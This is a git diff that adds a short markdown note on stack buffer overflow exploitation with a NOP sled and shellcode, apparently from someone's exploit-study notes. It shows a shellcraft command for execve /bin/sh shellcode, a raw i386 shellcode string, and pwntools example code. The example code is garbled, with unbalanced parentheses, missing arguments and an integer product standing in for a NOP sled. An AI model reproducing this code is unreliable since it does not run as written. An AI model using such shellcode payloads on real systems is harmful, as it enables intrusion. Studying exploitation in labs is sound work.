diff --git a/exploit/buffer_overflow/docs/cut_stack_in_half.md b/exploit/buffer_overflow/docs/cut_stack_in_half.md new file mode 100644 index 0000000..3255b7d --- /dev/null +++ b/exploit/buffer_overflow/docs/cut_stack_in_half.md @@ -0,0 +1,32 @@ +# Cut Stack in Half + NOPsled + +* Stack has to be executable +* `cylic buffer` + `eip` content is `esp` + half of the stack + NOPsled + shellcode +* **ASLR has to be off** or `eip` content address pointing into the sled needs to be fuzzed hard + +## shellcraft +* for example +```sh +shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f s +``` + +## Usage +* measure `eip` offset via + ```sh + cyclic + ``` + * Check eip content via gdb + ```sh + cyclic -l + ``` +* Example code +```python +from pwn import * + +padding(cyclic(cyclic_find()) +eip = p32( + some offset into stack) +sled = 90 * 100 +shellcode = "jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80" +payload = padding + eip + sled + shellcode +``` + diff --git a/exploit/buffer_overflow/docs/radare2.md b/exploit/buffer_overflow/docs/ret_address_reuse.md similarity index 100% rename from exploit/buffer_overflow/docs/radare2.md rename to exploit/buffer_overflow/docs/ret_address_reuse.md